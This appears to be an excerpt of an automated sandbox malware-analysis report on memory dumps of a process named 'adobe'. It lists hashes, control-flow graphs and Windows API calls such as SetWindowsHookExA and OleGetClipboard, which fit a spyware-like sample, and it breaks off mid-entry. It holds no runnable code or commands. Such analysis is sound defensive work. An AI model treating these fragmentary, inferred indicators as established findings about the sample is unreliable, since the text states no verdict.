                                    • API String ID:
                                    • Opcode ID: a87d818058e0f499ea7bbabc7599104c79f271ab40d5aa08634fd0b9ed16bd3b
                                    • Instruction ID: eb3797fbb0ab8ebc05eb37bd6c944b7a46650146634ef252b9137615f3f7bb17
                                    • Opcode Fuzzy Hash: a87d818058e0f499ea7bbabc7599104c79f271ab40d5aa08634fd0b9ed16bd3b
                                    • Instruction Fuzzy Hash: D1328034B10209CFDB54DB69D980BAEB7B6EB88310F208526F445E7759DB35EC46CB90
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7f9abe7303a21b5f250bae4fb2efe41120394a21744c0f72928d7e6b0fa3bd54
                                    • Instruction ID: 6ba62b9c3a900c9d98683217301bb93a3b7c2e07c066ba0eb5e106b53cd809ed
                                    • Opcode Fuzzy Hash: 7f9abe7303a21b5f250bae4fb2efe41120394a21744c0f72928d7e6b0fa3bd54
                                    • Instruction Fuzzy Hash: DF12DF71F003058FDF60DB66C98066EBBBAEF85310F21842AE916DB795DA34ED41CB90
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bad1b0b8f473027a842536550a2fabb3a72949f374439da3a4cca6102c05db77
                                    • Instruction ID: feaaf664fd99b1bf1293275a04bc875652ccf4f5ed15033fa1693b57bd8cd6a9
                                    • Opcode Fuzzy Hash: bad1b0b8f473027a842536550a2fabb3a72949f374439da3a4cca6102c05db77
                                    • Instruction Fuzzy Hash: 79227234E002098FDF64DB5AC5907AEB7BAEB45310F308826F449EB799EA35DC91CB51

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 696ac40-696ac5e 1 696ac60-696ac63 0->1 2 696ac65-696ac6e 1->2 3 696ac73-696ac76 1->3 2->3 4 696ac78-696ac94 3->4 5 696ac99-696ac9c 3->5 4->5 6 696acb6-696acb9 5->6 7 696ac9e-696acb1 5->7 8 696accd-696acd0 6->8 9 696acbb-696acc8 6->9 7->6 11 696acd2-696acd7 8->11 12 696acda-696acdd 8->12 9->8 11->12 15 696acf7-696acfa 12->15 16 696acdf-696ace8 12->16 20 696ad00-696ad03 15->20 21 696ae5d-696ae66 15->21 18 696ae77-696aeae 16->18 19 696acee-696acf2 16->19 29 696aeb0-696aeb3 18->29 19->15 23 696ad14-696ad16 20->23 24 696ad05-696ad09 20->24 21->16 22 696ae6c-696ae76 21->22 27 696ad1d-696ad20 23->27 28 696ad18 23->28 24->22 26 696ad0f 24->26 26->23 27->1 30 696ad26-696ad4a 27->30 28->27 31 696aeb5-696aeb9 29->31 32 696aec0-696aec3 29->32 46 696ad50-696ad5f 30->46 47 696ae5a 30->47 34 696aeef-696af2a 31->34 35 696aebb 31->35 36 696aee6-696aee9 32->36 37 696aec5-696aee1 32->37 44 696af30-696af3c 34->44 45 696b11d-696b130 34->45 35->32 36->34 38 696b152-696b155 36->38 37->36 41 696b157-696b161 38->41 42 696b162-696b165 38->42 48 696b167 call 696b198 42->48 49 696b174-696b176 42->49 58 696af3e-696af57 44->58 59 696af5c-696afa0 44->59 50 696b132-696b133 45->50 61 696ad77-696adb2 call 6966510 46->61 62 696ad61-696ad67 46->62 47->21 57 696b16d-696b16f 48->57 52 696b17d-696b180 49->52 53 696b178 49->53 50->38 52->29 54 696b186-696b190 52->54 53->52 57->49 58->50 76 696afa2-696afb4 59->76 77 696afbc-696affb 59->77 78 696adb4-696adba 61->78 79 696adca-696ade1 61->79 63 696ad6b-696ad6d 62->63 64 696ad69 62->64 63->61 64->61 76->77 85 696b0e2-696b0f7 77->85 86 696b001-696b0dc call 6966510 77->86 80 696adbe-696adc0 78->80 81 696adbc 78->81 90 696ade3-696ade9 79->90 91 696adf9-696ae0a 79->91 80->79 81->79 85->45 86->85 93 696aded-696adef 90->93 94 696adeb 90->94 98 696ae22-696ae53 91->98 99 696ae0c-696ae12 91->99 93->91 94->91 98->47 101 696ae16-696ae18 99->101 102 696ae14 99->102 101->98 102->98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                    • API String ID: 0-1078448309
                                    • Opcode ID: 77b1ca2d44b39076d0c5fc0cb7afb39c5a3a7515454c34cdf6dd7e63485fb4d3
                                    • Instruction ID: 09b9d616b9debdbe704a9c5d6a843b65d6a763940a10475c7a3da4d3d0660d0c
                                    • Opcode Fuzzy Hash: 77b1ca2d44b39076d0c5fc0cb7afb39c5a3a7515454c34cdf6dd7e63485fb4d3
                                    • Instruction Fuzzy Hash: 30E14030E103068FDB65DF6AD5906AEB7B6EF85300F208929E405EB759DB35EC46CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                    • API String ID: 0-1342094364
                                    • Opcode ID: d6be3e44462de85d0d71d1eb39b26bc41932f737efd3eb9103e38a24b583cb62
                                    • Instruction ID: be982a52b768d704bac837b8e2730be8fa6ef9338cb3925dd38294726656a50c
                                    • Opcode Fuzzy Hash: d6be3e44462de85d0d71d1eb39b26bc41932f737efd3eb9103e38a24b583cb62
                                    • Instruction Fuzzy Hash: 43029E30E003098FDB64DF6AD5806ADB7B6FB44314F20892AE455DBB59EB34EC95CB81

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 426 69690c8-69690ed 427 69690ef-69690f2 426->427 428 69699b0-69699b3 427->428 429 69690f8-696910d 427->429 430 69699b5-69699d4 428->430 431 69699d9-69699db 428->431 437 6969125-696913b 429->437 438 696910f-6969115 429->438 430->431 432 69699e2-69699e5 431->432 433 69699dd 431->433 432->427 436 69699eb-69699f5 432->436 433->432 443 6969146-6969148 437->443 439 6969117 438->439 440 6969119-696911b 438->440 439->437 440->437 444 6969160-69691d1 443->444 445 696914a-6969150 443->445 456 69691d3-69691f6 444->456 457 69691fd-6969219 444->457 446 6969154-6969156 445->446 447 6969152 445->447 446->444 447->444 456->457 462 6969245-6969260 457->462 463 696921b-696923e 457->463 468 6969262-6969284 462->468 469 696928b-69692a6 462->469 463->462 468->469 474 69692cb-69692d9 469->474 475 69692a8-69692c4 469->475 476 69692db-69692e4 474->476 477 69692e9-6969363 474->477 475->474 476->436 483 6969365-6969383 477->483 484 69693b0-69693c5 477->484 488 6969385-6969394 483->488 489 696939f-69693ae 483->489 484->428 488->489 489->483 489->484
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq
                                    • API String ID: 0-2881790790
                                    • Opcode ID: 4bde54725e2aa3ca4b3b576213828a00fc1974ca8a1efc8aeedb06fac10c1cb6
                                    • Instruction ID: f7e1a09c2ddf274948b398334054fee4ba9d6f173e954db4896a0b0b5ab910db
                                    • Opcode Fuzzy Hash: 4bde54725e2aa3ca4b3b576213828a00fc1974ca8a1efc8aeedb06fac10c1cb6
                                    • Instruction Fuzzy Hash: DB913134F1020A8FDB64DF65D9507AEB7FAEF84240F208569D409DB798EA34ED468F90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 492 696cec8-696cee3 493 696cee5-696cee8 492->493 494 696cef2-696cef5 493->494 495 696ceea-696ceef 493->495 496 696cef7-696cf39 494->496 497 696cf3e-696cf41 494->497 495->494 496->497 498 696cf43-696cf85 497->498 499 696cf8a-696cf8d 497->499 498->499 501 696cfd6-696cfd9 499->501 502 696cf8f-696cfd1 499->502 503 696cfdb-696cfdd 501->503 504 696cfe8-696cfeb 501->504 502->501 507 696cfe3 503->507 508 696d26f-696d278 503->508 509 696d034-696d037 504->509 510 696cfed-696d02f 504->510 507->504 515 696d287-696d293 508->515 516 696d27a-696d27f 508->516 513 696d080-696d083 509->513 514 696d039-696d07b 509->514 510->509 522 696d085-696d0c7 513->522 523 696d0cc-696d0cf 513->523 514->513 518 696d3a4-696d3a9 515->518 519 696d299-696d2ad 515->519 516->515 543 696d3b1 518->543 542 696d2b3-696d2c5 519->542 519->543 522->523 526 696d0d1-696d113 523->526 527 696d118-696d11b 523->527 526->527 529 696d3b4-696d3c0 527->529 530 696d121-696d124 527->530 536 696d3c6-696d6b3 529->536 537 696d14c-696d15b 529->537 540 696d126-696d142 530->540 541 696d147-696d14a 530->541 704 696d8da-696d8e4 536->704 705 696d6b9-696d6bf 536->705 550 696d15d-696d162 537->550 551 696d16a-696d176 537->551 540->541 541->537 549 696d193-696d196 541->549 567 696d2c7-696d2cd 542->567 568 696d2e9-696d2eb 542->568 543->529 554 696d1a5-696d1a8 549->554 555 696d198-696d19a 549->555 550->551 552 696d8e5-696d91e 551->552 553 696d17c-696d18e 551->553 583 696d920-696d923 552->583 553->549 565 696d1f1-696d1f4 554->565 566 696d1aa-696d1ec 554->566 555->543 564 696d1a0 555->564 564->554 577 696d1f6-696d20c 565->577 578 696d211-696d214 565->578 566->565 572 696d2d1-696d2dd 567->572 573 696d2cf 567->573 574 696d2f5-696d301 568->574 584 696d2df-696d2e7 572->584 573->584 605 696d303-696d30d 574->605 606 696d30f 574->606 577->578 586 696d216-696d225 578->586 587 696d25d-696d25f 578->587 591 696d946-696d949 583->591 592 696d925-696d941 583->592 584->574 597 696d227-696d22c 586->597 598 696d234-696d240 586->598 588 696d266-696d269 587->588 589 696d261 587->589 588->493 588->508 589->588 603 696d97c-696d97f 591->603 604 696d94b-696d977 591->604 592->591 597->598 598->552 607 696d246-696d258 598->607 610 696d981 call 696da3d 603->610 611 696d98e-696d990 603->611 604->603 612 696d314-696d316 605->612 606->612 607->587 621 696d987-696d989 610->621 618 696d997-696d99a 611->618 619 696d992 611->619 612->543 617 696d31c-696d338 call 6966510 612->617 634 696d347-696d353 617->634 635 696d33a-696d33f 617->635 618->583 623 696d99c-696d9ab 618->623 619->618 621->611 629 696da12-696da27 623->629 630 696d9ad-696da10 call 6966510 623->630 630->629 634->518 637 696d355-696d3a2 634->637 635->634 637->543 706 696d6c1-696d6c6 705->706 707 696d6ce-696d6d7 705->707 706->707 707->552 708 696d6dd-696d6f0 707->708 710 696d6f6-696d6fc 708->710 711 696d8ca-696d8d4 708->711 712 696d6fe-696d703 710->712 713 696d70b-696d714 710->713 711->704 711->705 712->713 713->552 714 696d71a-696d73b 713->714 717 696d73d-696d742 714->717 718 696d74a-696d753 714->718 717->718 718->552 719 696d759-696d776 718->719 719->711 722 696d77c-696d782 719->722 722->552 723 696d788-696d7a1 722->723 725 696d7a7-696d7ce 723->725 726 696d8bd-696d8c4 723->726 725->552 729 696d7d4-696d7de 725->729 726->711 726->722 729->552 730 696d7e4-696d7fb 729->730 732 696d7fd-696d808 730->732 733 696d80a-696d825 730->733 732->733 733->726 738 696d82b-696d844 call 6966510 733->738 742 696d846-696d84b 738->742 743 696d853-696d85c 738->743 742->743 743->552 744 696d862-696d8b6 743->744 744->726
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq
                                    • API String ID: 0-2086306503
                                    • Opcode ID: 99042121470e221e147a6bfa88a78293b464cfda265c2833387080a0cbc21b68
                                    • Instruction ID: cfb1b8908543fdaa1168897d3b38abf810dd245ffbd9f74b472ee31e7bad4fe5
                                    • Opcode Fuzzy Hash: 99042121470e221e147a6bfa88a78293b464cfda265c2833387080a0cbc21b68
                                    • Instruction Fuzzy Hash: 6E627330B002068FCB55EF69D680A5EB7B2FF84304B218A69D415DF769DB75ED4ACB80

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 752 6964b18-6964b3c 754 6964b3e-6964b41 752->754 755 6964b47-6964c3f 754->755 756 6965220-6965223 754->756 776 6964c45-6964c92 call 69653c0 755->776 777 6964cc2-6964cc9 755->777 757 6965244-6965246 756->757 758 6965225-696523f 756->758 759 696524d-6965250 757->759 760 6965248 757->760 758->757 759->754 762 6965256-6965263 759->762 760->759 790 6964c98-6964cb4 776->790 778 6964ccf-6964d3f 777->778 779 6964d4d-6964d56 777->779 796 6964d41 778->796 797 6964d4a 778->797 779->762 793 6964cb6 790->793 794 6964cbf 790->794 793->794 794->777 796->797 797->779
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: fpq$XPpq$\Opq
                                    • API String ID: 0-2571271785
                                    • Opcode ID: 80c4115bbb9934ed22c2d811437f5a187565861194a7889fb53108d833b93455
                                    • Instruction ID: 93b18ac33157988815a7ac85da27a0f007c289905412af25c575907f60d52222
                                    • Opcode Fuzzy Hash: 80c4115bbb9934ed22c2d811437f5a187565861194a7889fb53108d833b93455
                                    • Instruction Fuzzy Hash: 40618030F002089FEB549FA5C8147AEBBF6EF88700F20852AE506EB395DA759D459F91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 941 696a318-696a319 942 696a31b-696a321 941->942 943 696a2a9-696a2b0 941->943 944 696a323-696a348 942->944 945 696a2b1-696a2b3 942->945 946 696a2b5-696a2b8 943->946 948 696a34a-696a34d 944->948 945->946 949 696a2da-696a2dd 946->949 950 696a2ba-696a2d5 946->950 951 696a370-696a373 948->951 952 696a34f-696a36b 948->952 953 696a2ff-696a301 949->953 954 696a2df 949->954 950->949 955 696a41f-696a422 951->955 956 696a379-696a412 call 6962058 951->956 952->951 959 696a303 953->959 960 696a308-696a30b 953->960 965 696a2eb-696a2fa 954->965 957 696a553-696a556 955->957 958 696a428-696a455 call 6962058 955->958 956->958 1001 696a414-696a41e 956->1001 963 696a563-696a566 957->963 964 696a558-696a562 957->964 994 696a45b-696a480 958->994 995 696a548-696a552 958->995 959->960 967 696a290-696a293 960->967 968 696a30d-696a311 960->968 971 696a581-696a584 963->971 972 696a568-696a576 963->972 965->953 967->946 974 696a295-696a2a7 967->974 977 696a586-696a59f 971->977 978 696a5a4-696a5a6 971->978 972->956 985 696a57c 972->985 974->943 977->978 979 696a5ad-696a5b0 978->979 980 696a5a8 978->980 979->948 984 696a5b6-696a5bf 979->984 980->979 985->971 1002 696a482-696a488 994->1002 1003 696a48a 994->1003 1004 696a490-696a542 call 6966510 call 6962058 1002->1004 1003->1004 1004->994 1004->995
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: X!@$x!@
                                    • API String ID: 0-2527372166
                                    • Opcode ID: 3891beffd36bc12276ba506ab2756d4daba2e6c74db229b312ae682f8328debc
                                    • Instruction ID: 3406f727ca70479842be90e5b5e31a4ad4b64c059ea2f87da12b1e68a8be14f0
                                    • Opcode Fuzzy Hash: 3891beffd36bc12276ba506ab2756d4daba2e6c74db229b312ae682f8328debc
                                    • Instruction Fuzzy Hash: 7F81A031F002058FCB54EFA9D9906ADB7B6EF88310F208929E509E7754EB35ED46CB90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1107 69690b9-69690ed 1108 69690ef-69690f2 1107->1108 1109 69699b0-69699b3 1108->1109 1110 69690f8-696910d 1108->1110 1111 69699b5-69699d4 1109->1111 1112 69699d9-69699db 1109->1112 1118 6969125-696913b 1110->1118 1119 696910f-6969115 1110->1119 1111->1112 1113 69699e2-69699e5 1112->1113 1114 69699dd 1112->1114 1113->1108 1117 69699eb-69699f5 1113->1117 1114->1113 1124 6969146-6969148 1118->1124 1120 6969117 1119->1120 1121 6969119-696911b 1119->1121 1120->1118 1121->1118 1125 6969160-69691d1 1124->1125 1126 696914a-6969150 1124->1126 1137 69691d3-69691f6 1125->1137 1138 69691fd-6969219 1125->1138 1127 6969154-6969156 1126->1127 1128 6969152 1126->1128 1127->1125 1128->1125 1137->1138 1143 6969245-6969260 1138->1143 1144 696921b-696923e 1138->1144 1149 6969262-6969284 1143->1149 1150 696928b-69692a6 1143->1150 1144->1143 1149->1150 1155 69692cb-69692d9 1150->1155 1156 69692a8-69692c4 1150->1156 1157 69692db-69692e4 1155->1157 1158 69692e9-6969363 1155->1158 1156->1155 1157->1117 1164 6969365-6969383 1158->1164 1165 69693b0-69693c5 1158->1165 1169 6969385-6969394 1164->1169 1170 696939f-69693ae 1164->1170 1165->1109 1169->1170 1170->1164 1170->1165
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq
                                    • API String ID: 0-3550614674
                                    • Opcode ID: f229826e91bd272961dc90aeab48f85c235b4aaeb2dfd4d7f353099b529b1bd9
                                    • Instruction ID: 11b5f2eaaeb9795fb5e60bd555bc96f6b33d6bb6243cfad2bc943608a00286cf
                                    • Opcode Fuzzy Hash: f229826e91bd272961dc90aeab48f85c235b4aaeb2dfd4d7f353099b529b1bd9
                                    • Instruction Fuzzy Hash: A2513074B002068FDF54DF75D9507AEB7FAEB88640F208569D809D7398EA35EC128F90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1210 6952e0d-6952e1a 1212 6952e1c-6952e21 1210->1212 1213 6952e27-6952e29 1212->1213 1214 6952e23-6952e25 1212->1214 1215 6952e2f-6952e31 1213->1215 1216 6952e2b-6952e2d 1213->1216 1214->1213 1217 6952e37-6952e39 call 69516e4 1215->1217 1218 6952e33-6952e35 1215->1218 1216->1215 1237 6952e3a call 6952e0d 1217->1237 1238 6952e3a call 6952e58 1217->1238 1218->1217 1221 6952e3d-6952e50 1221->1212 1222 6952e52-6952ebe 1221->1222 1224 6952ec0-6952ec6 1222->1224 1225 6952ec9-6952ed0 1222->1225 1224->1225 1226 6952ed2-6952ed8 1225->1226 1227 6952edb-6952f7a CreateWindowExW 1225->1227 1226->1227 1229 6952f83-6952fbb 1227->1229 1230 6952f7c-6952f82 1227->1230 1234 6952fbd-6952fc0 1229->1234 1235 6952fc8 1229->1235 1230->1229 1234->1235 1236 6952fc9 1235->1236 1236->1236 1237->1221 1238->1221
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6950000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8df02ac648057878ebf254c3aad55832699131e748dea875251f3dbc6d452378
                                    • Instruction ID: 014d6b9090fb6fac17d637cbfc9e52efbc285f8f7939a225bf7db9163f0cf2e1
                                    • Opcode Fuzzy Hash: 8df02ac648057878ebf254c3aad55832699131e748dea875251f3dbc6d452378
                                    • Instruction Fuzzy Hash: AB51F271C00209AFDF15CFA9D984ADEBFB5FF48310F25812AE818AB260D7719995DF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1239 12aed30-12aed4b 1240 12aed4d-12aed74 1239->1240 1241 12aed75-12aed8b 1239->1241 1262 12aed8d call 12aee18 1241->1262 1263 12aed8d call 12aed30 1241->1263 1244 12aed92-12aed94 1245 12aed9a-12aedf9 1244->1245 1246 12aed96-12aed99 1244->1246 1253 12aedfb-12aedfe 1245->1253 1254 12aedff-12aee8c GlobalMemoryStatusEx 1245->1254 1258 12aee8e-12aee94 1254->1258 1259 12aee95-12aeebd 1254->1259 1258->1259 1262->1244 1263->1244
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4115357874.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_12a0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5a9e8068ec5bd708a83220647a59548ad0f378c73b23a560bf4f18b25dc899d0
                                    • Instruction ID: a5a891836f67c2e31ddce9f51f29f8e9614ead22956b8b41cc7960d5aed60814
                                    • Opcode Fuzzy Hash: 5a9e8068ec5bd708a83220647a59548ad0f378c73b23a560bf4f18b25dc899d0
                                    • Instruction Fuzzy Hash: E8412172E0439A8FCB04DFA9D8002DABFF0EF89320F1585AAD544E7251DB349885CBE1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1264 6952e58-6952ebe 1265 6952ec0-6952ec6 1264->1265 1266 6952ec9-6952ed0 1264->1266 1265->1266 1267 6952ed2-6952ed8 1266->1267 1268 6952edb-6952f7a CreateWindowExW 1266->1268 1267->1268 1270 6952f83-6952fbb 1268->1270 1271 6952f7c-6952f82 1268->1271 1275 6952fbd-6952fc0 1270->1275 1276 6952fc8 1270->1276 1271->1270 1275->1276 1277 6952fc9 1276->1277 1277->1277
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06952F6A
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6950000_adobe.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: d2dc8bab7c49cb5267474862904e7c5f0be825185408579c9f3f5c6812b1fa6d
                                    • Instruction ID: 5324b315615af810fea4170047f71027ddf6431debe1d5b299a9782b52056c3d
                                    • Opcode Fuzzy Hash: d2dc8bab7c49cb5267474862904e7c5f0be825185408579c9f3f5c6812b1fa6d
                                    • Instruction Fuzzy Hash: EE41C0B1D003099FDB14CF99D984ADEFBB5BF48310F24852AE819AB210D7719985CF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1278 6956694-6957964 1281 6957a14-6957a34 call 695170c 1278->1281 1282 695796a-695796f 1278->1282 1289 6957a37-6957a44 1281->1289 1283 6957971-69579a8 1282->1283 1284 69579c2-69579fa CallWindowProcW 1282->1284 1291 69579b1-69579c0 1283->1291 1292 69579aa-69579b0 1283->1292 1286 6957a03-6957a12 1284->1286 1287 69579fc-6957a02 1284->1287 1286->1289 1287->1286 1291->1289 1292->1291
                                    APIs
                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 069579E9
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6950000_adobe.jbxd
                                    Similarity
                                    • API ID: CallProcWindow
                                    • String ID:
                                    • API String ID: 2714655100-0
                                    • Opcode ID: 5bce8c4c79d62a75537d7f7e077655b25b8fb83c9f3c645568963f40a559a042
                                    • Instruction ID: c1174d7feb3beda2e4ea4ed4bb736bd7e1b6c372d0378e449e2d8fb390b7f7f1
                                    • Opcode Fuzzy Hash: 5bce8c4c79d62a75537d7f7e077655b25b8fb83c9f3c645568963f40a559a042
                                    • Instruction Fuzzy Hash: 254127B4A00305CFDB54CF99C488AAABBF5FB88314F25C859D919AB721D734A941CFA0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6950000_adobe.jbxd
                                    Similarity
                                    • API ID: Clipboard
                                    • String ID:
                                    • API String ID: 220874293-0
                                    • Opcode ID: 78fd75fccf5de71a4299c6bd47cba7618953ce9c817baabedf3dbae0979512cd
                                    • Instruction ID: 084d3b35b82ba74967f6c65d04c2bbea874e676b43f199a53a9011552749b893
                                    • Opcode Fuzzy Hash: 78fd75fccf5de71a4299c6bd47cba7618953ce9c817baabedf3dbae0979512cd
                                    • Instruction Fuzzy Hash: B73103B0E01258DFDB10DF99CA84BDDBBF5AB48304F248059E404BB294DB755845CF95

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1295 69580a8-6958710 OleGetClipboard 1298 6958712-6958718 1295->1298 1299 6958719-6958767 1295->1299 1298->1299 1304 6958777 1299->1304 1305 6958769-695876d 1299->1305 1307 6958778 1304->1307 1305->1304 1306 695876f 1305->1306 1306->1304 1307->1307
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6950000_adobe.jbxd
                                    Similarity
                                    • API ID: Clipboard
                                    • String ID:
                                    • API String ID: 220874293-0
                                    • Opcode ID: a8f460699eb1670f66106d9fe8078d1c1f4fee60c9ccbd7d19f3aee85ba151df
                                    • Instruction ID: 22adb25345fc5e1509ce0d3c2ad567d83e52dabfae3a7ffaea3e1fd2f7d5f605
                                    • Opcode Fuzzy Hash: a8f460699eb1670f66106d9fe8078d1c1f4fee60c9ccbd7d19f3aee85ba151df
                                    • Instruction Fuzzy Hash: C13102B0E01218DFDB50CF99CA84B9DBBF5AB48304F208059E404BB294D7B56845CF95
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06956B1F
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6950000_adobe.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: d45f0378516b4d523d232e4b6bb55405a8f6accac33152796933af62e2413e0f
                                    • Instruction ID: c126244746fe1b1b12a7a74c67c0b2f434674002a3d980dfe4743557914a6d1a
                                    • Opcode Fuzzy Hash: d45f0378516b4d523d232e4b6bb55405a8f6accac33152796933af62e2413e0f
                                    • Instruction Fuzzy Hash: D721E4B5D00349AFDB10DFAAD984ADEBFF8EB48320F14841AE954A3310D775A940CFA5
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06956B1F
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6950000_adobe.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 87ceb33b36d8a0d293b9969aa6ff666c8496899bef0e072f1e01f622e5c9e628
                                    • Instruction ID: f38159b5a54b6aaa974bd1e79c6c19cf8d976d203ede984263d6be1ba4239dcc
                                    • Opcode Fuzzy Hash: 87ceb33b36d8a0d293b9969aa6ff666c8496899bef0e072f1e01f622e5c9e628
                                    • Instruction Fuzzy Hash: BF21E2B5D002089FDB10CFAAD984ADEBFF8EB48320F14841AE918A3310D374A940CFA4
                                    APIs
                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0695A343
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6950000_adobe.jbxd
                                    Similarity
                                    • API ID: HookWindows
                                    • String ID:
                                    • API String ID: 2559412058-0
                                    • Opcode ID: 5fa93542f1671cd10635cfd8bc4d2d2516f0bdbc5230bee50638c0a9ba3e902a
                                    • Instruction ID: 52d45400bc6a818de9949d88b708ad135c2bd21bc1654630242860e831db34ba
                                    • Opcode Fuzzy Hash: 5fa93542f1671cd10635cfd8bc4d2d2516f0bdbc5230bee50638c0a9ba3e902a
